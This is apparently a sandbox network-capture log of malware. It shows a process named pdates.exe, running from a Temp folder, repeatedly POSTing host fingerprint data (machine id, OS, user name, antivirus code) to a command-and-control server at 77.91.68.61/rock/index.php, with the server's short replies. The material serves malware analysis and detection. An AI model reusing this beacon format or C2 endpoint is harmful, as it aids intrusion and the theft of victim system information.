Jul 27, 2023 01:35:22.484026909 CEST	4150	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:22.531964064 CEST	4151	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
527	192.168.2.5	50248	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:22.690012932 CEST	4151	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:22.737277031 CEST	4152	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
528	192.168.2.5	50249	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:22.896531105 CEST	4152	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:22.944031954 CEST	4153	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
529	192.168.2.5	50250	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:23.103602886 CEST	4153	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:23.152128935 CEST	4153	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.5	49770	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:17.761435032 CEST	2898	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:17.809418917 CEST	2898	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
530	192.168.2.5	50251	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:23.322489023 CEST	4154	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:23.370642900 CEST	4154	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
531	192.168.2.5	50252	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:23.536578894 CEST	4155	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:23.585880041 CEST	4155	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
532	192.168.2.5	50253	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:24.056982994 CEST	4156	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:24.105285883 CEST	4156	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
533	192.168.2.5	50254	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:24.347965002 CEST	4157	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:24.394658089 CEST	4157	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
534	192.168.2.5	50255	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:24.564244986 CEST	4158	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:24.612615108 CEST	4158	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:24 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
535	192.168.2.5	50256	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:25.213677883 CEST	4159	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:25.261785984 CEST	4159	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
536	192.168.2.5	50257	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:25.454958916 CEST	4160	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:25.503771067 CEST	4160	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
537	192.168.2.5	50258	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:26.737296104 CEST	4161	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:26.786570072 CEST	4161	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:26 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
538	192.168.2.5	50259	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:27.207518101 CEST	4162	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:27.256613970 CEST	4162	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
539	192.168.2.5	50260	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:27.436080933 CEST	4163	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:27.484719992 CEST	4163	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.5	49771	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:17.977741957 CEST	2899	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:18.025604010 CEST	2899	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:17 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
540	192.168.2.5	50261	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:27.646238089 CEST	4164	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:27.694983959 CEST	4164	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
541	192.168.2.5	50262	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:27.877113104 CEST	4165	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:27.924724102 CEST	4165	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:27 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
542	192.168.2.5	50263	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:28.092830896 CEST	4166	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:28.141859055 CEST	4166	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
543	192.168.2.5	50264	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:28.327436924 CEST	4167	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:28.376115084 CEST	4167	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
544	192.168.2.5	50265	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:28.553200960 CEST	4167	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:28.601458073 CEST	4168	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
545	192.168.2.5	50266	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:28.756532907 CEST	4168	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:28.804827929 CEST	4169	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
546	192.168.2.5	50267	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:28.978720903 CEST	4169	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:29.026982069 CEST	4170	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:28 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
547	192.168.2.5	50268	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
